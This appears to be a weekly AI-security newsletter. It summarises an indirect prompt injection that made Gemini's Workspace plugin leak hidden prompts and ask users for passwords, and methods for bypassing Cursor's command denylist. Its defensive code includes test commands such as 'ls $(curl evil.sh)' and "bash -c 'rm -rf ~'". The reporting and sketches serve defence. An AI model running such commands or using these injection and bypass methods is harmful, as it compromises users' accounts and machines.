Towards Secure AI Week 29 — America’s AI Action Plan, LLM Plugin Flaws, and Package Hallucination Risks


From insecure plugins to hallucinated packages, this week’s AI security landscape exposes the fragile trust surface of generative and agentic systems.

New research reveals that leading LLMs frequently invent fake software dependencies, creating a dangerous supply chain vulnerability, while Google’s Gemini plugin fell prey to indirect prompt injection capable of full session compromise. Meanwhile, UNESCO and the White House push forward new governance tools—offering both community-driven AI Red Teaming frameworks and national-level AI infrastructure policies. And as agentic coding tools like Cursor race ahead, flawed safeguards show how easily shell access can slip past superficial controls.

The message is clear: as AI systems grow more autonomous, security must evolve beyond static filters and into proactive validation, governance, and AI Red Teaming at scale.

White House Unveils America’s AI Action Plan

The White House, July 23, 2025

The U.S. government has announced a comprehensive strategy to consolidate global AI leadership through deregulation, infrastructure expansion, and export of AI technologies—shaping future implications for security, geopolitics, and procurement.

The plan details over 90 federal policy actions across three pillars: innovation acceleration, AI infrastructure, and global diplomatic and security leadership. Highlights include: fast-tracking data center and chip fab development; removing federal regulatory burdens on AI deployment; requiring ideological neutrality in frontier LLMs used in federal procurement; and launching full-stack AI export packages in collaboration with U.S. industry partners. The plan positions AI as central to economic strength, national security, and technological sovereignty. For a full breakdown of AI-specific security implications, see America’s AI Action Plan — Top AI Security Insights.

How to deal with it:

  • Monitor federal procurement changes to assess how new neutrality requirements could affect approved LLM vendors.
  • Track the impact of expedited infrastructure initiatives (e.g., data centers, fabs) on secure AI system deployment timelines.
  • Assess how global AI export packages may shape international AI security norms and supply chain trust models.

New UNESCO Playbook Helps Communities Red Team AI for Social Good 

Global Teacher Prize, July 23, 2025

This initiative provides a structured way for communities to test AI systems for bias and harm, especially around gender-based violence.

UNESCO, in collaboration with Dr. Rumman Chowdhury and Humane Intelligence, published an AI Red Teaming Playbook aimed at civil society, educators, and policymakers. The resource is based on a live AI Red Teaming exercise and offers hands-on methods for identifying stereotypes, exclusion, and safety issues in generative AI systems. It emphasizes community participation in evaluating AI risks and promotes inclusive, transparent development practices.

How to deal with it:

  • Use the Playbook to design AI Red Teaming sessions that explore AI bias and social impact in educational or advocacy settings.
  • Apply the methods to assess risks in generative AI tools related to gender, equity, and public sector use.
  • Incorporate AI Red Teaming findings into broader AI governance and ethical review frameworks.

LLM-Created “Package Hallucinations” Pose New Software Supply Chain Risk

I-hls, July 22, 2025

This study highlights a novel vulnerability where AI-generated code introduces fake package names, exposing software supply chains to malicious exploitation.

Researchers from three U.S. universities analyzed over 576,000 code samples from 16 LLMs and discovered that models frequently hallucinate non-existent software packages during code generation. Commercial tools like GPT-4 and Claude showed hallucination rates above 5%, while some open-source models exceeded 20%. Attackers could register these fake package names in public repositories, leading unsuspecting developers to import malicious code.

How to deal with it:

  • Require developers to verify all AI-suggested dependencies before importing them into projects.
  • Monitor public repositories for suspicious uploads of hallucinated package names.
  • Integrate automated validation and allowlist checks into AI-assisted development pipelines (a minimal sketch follows this list).
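
As a rough illustration of that last point, here is a minimal sketch of a pre-import dependency check, assuming a Python/PyPI toolchain; the allowlist file and the package names are hypothetical and only stand in for an organization's own approved-dependency process.

```python
# Minimal sketch: vet AI-suggested dependencies before they enter a project.
# Assumes a Python/PyPI toolchain; the allowlist file and package names are
# illustrative, not taken from the study described above.
import urllib.request
from urllib.error import HTTPError

ALLOWLIST_FILE = "approved_packages.txt"  # hypothetical internal allowlist


def exists_on_pypi(name: str) -> bool:
    """Return True if the package is actually published on PyPI."""
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status == 200
    except HTTPError:
        return False


def load_allowlist(path: str) -> set[str]:
    with open(path) as f:
        return {line.strip().lower() for line in f if line.strip()}


def vet_dependencies(suggested: list[str]) -> None:
    allowlist = load_allowlist(ALLOWLIST_FILE)
    for name in suggested:
        if not exists_on_pypi(name):
            print(f"BLOCK {name}: not published on PyPI (likely hallucinated)")
        elif name.lower() not in allowlist:
            print(f"BLOCK {name}: exists but is not on the internal allowlist")
        else:
            print(f"OK    {name}")


if __name__ == "__main__":
    # Two real packages plus a made-up name standing in for a hallucination.
    vet_dependencies(["requests", "numpy", "acme-json-helpers"])
```

Note that the PyPI existence check alone is not sufficient: as the researchers point out, attackers can simply register the hallucinated name. The allowlist is what keeps an unvetted package from slipping into the build.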

LLM Plugin Vulnerabilities Highlight Growing Threat to AI Ecosystems

SC Media, July 25, 2025

Vulnerabilities in plugins expose LLM-based systems to prompt injection, data leaks, and full session compromise—posing risks not just to models but to their surrounding infrastructure.

HiddenLayer discovered that Google’s Gemini Pro and Ultra, when used with the Workspace plugin, could be tricked into leaking hidden prompts and even prompting users for passwords via indirect prompt injection. These flaws illustrate systemic design issues in how LLM plugins process unvalidated inputs, particularly when integrated with external tools like vector databases or SQL filters. Experts warn that such plugins often rely on insecure APIs and lack granular validation, creating high-risk pathways for attackers.

How to deal with it:

  • Enforce strict input validation and avoid accepting freeform or user-generated code in plugins.
  • Design plugins using least-privilege principles and bind plugin actions to authenticated identities with scoped tokens (see the sketch after this list).
  • Incorporate OWASP ASVS controls and test all plugins with static, dynamic, and red-teaming techniques during development.
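
To make the least-privilege and input-validation points concrete, below is a minimal sketch of how a plugin action handler might gate tool calls. The tool names, scopes, and request shape are hypothetical and are not drawn from the Gemini Workspace integration discussed above.

```python
# Minimal sketch of least-privilege handling for an LLM plugin/tool call.
# Tool names, scopes, and the request shape are hypothetical examples.
import re
from dataclasses import dataclass

# Each tool is bound to an explicit scope; anything else is denied.
TOOL_SCOPES = {
    "calendar.read": {"calendar:read"},
    "drive.search": {"drive:read"},
}

# Reject shell/SQL-style metacharacters in model-supplied text.
FREEFORM_BLOCK = re.compile(r"[;&|`$<>]")


@dataclass
class PluginRequest:
    tool: str
    query: str
    token_scopes: set  # scopes carried by the caller's authenticated token


def handle(req: PluginRequest) -> str:
    # 1. Only registered tools may be invoked.
    required = TOOL_SCOPES.get(req.tool)
    if required is None:
        return "denied: unknown tool"
    # 2. The authenticated token must carry every scope the tool requires.
    if not required.issubset(req.token_scopes):
        return "denied: token lacks required scope"
    # 3. Treat model-supplied text as untrusted input, never as code.
    if len(req.query) > 256 or FREEFORM_BLOCK.search(req.query):
        return "denied: query failed input validation"
    return f"dispatching {req.tool} with sanitized query"


print(handle(PluginRequest("drive.search", "quarterly report", {"drive:read"})))
print(handle(PluginRequest("drive.search", "x; cat /etc/passwd", {"drive:read"})))
```

Binding each tool to scopes carried by an authenticated token means a prompt-injected instruction cannot reach data the caller was never authorized to touch, even if it slips past content filtering.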

Cursor’s Denylist Exposes the Risks of Agentic AI

Information Security Buzz, July 22, 2025

This incident reveals how agentic AI systems can silently bypass weak safeguards and execute malicious commands—putting developer environments at risk.

Cursor, an AI-powered coding tool, uses a denylist to block unsafe commands during auto-run execution. However, Backslash Research found four methods to bypass these protections using obfuscation, subshells, scripts, and Bash quoting tricks. These flaws allow agents to execute arbitrary commands, rendering the denylist ineffective and exposing users to malware, key exfiltration, and system compromise. Cursor confirmed the issue and plans to deprecate the denylist in a future release.

How to deal with it:

  • Disable auto-run features in agentic tools unless allowlist-based controls are enforced.
  • Avoid relying on denylists as primary defenses; use fine-grained permissioning and shell restrictions (a minimal allowlist sketch follows this list).
  • Add external monitoring tools to detect hidden payloads, script-based execution paths, and prompt injection attempts.
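
As a sketch of why allowlisting is the safer default, the snippet below gates auto-run commands against an explicit list of binaries and rejects shell metacharacters outright rather than trying to enumerate bad patterns. The allowed commands are illustrative, and this is not Cursor's actual mechanism.

```python
# Minimal sketch of an allowlist gate for auto-run shell commands,
# as an alternative to denylist filtering. Allowed binaries are illustrative.
import shlex

ALLOWED_BINARIES = {"ls", "cat", "pytest", "git"}   # explicit allowlist
SHELL_METACHARS = set(";&|`$(){}<>")                 # characters that enable subshells, chaining, redirection


def is_safe(command: str) -> bool:
    # Reject metacharacters outright: obfuscation, subshells, and quoting
    # tricks all depend on them in one form or another.
    if any(ch in SHELL_METACHARS for ch in command):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:
        return False  # unbalanced quotes and similar parsing tricks
    return bool(tokens) and tokens[0] in ALLOWED_BINARIES


for cmd in ["pytest -q", "git status", "ls $(curl evil.sh)", "bash -c 'rm -rf ~'"]:
    print(f"{'ALLOW' if is_safe(cmd) else 'BLOCK':5}  {cmd}")
```

The bypass techniques Backslash Research describes (obfuscation, subshells, scripts, and quoting tricks) all rely on exactly the constructs this gate refuses by default, which is why inverting the model from "block known-bad" to "allow known-good" tends to hold up better.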

 

For more expert breakdowns, visit our Trusted AI Blog or follow us on LinkedIn to stay up to date with the latest in AI security. Be the first to learn about emerging risks, tools, and defense strategies.

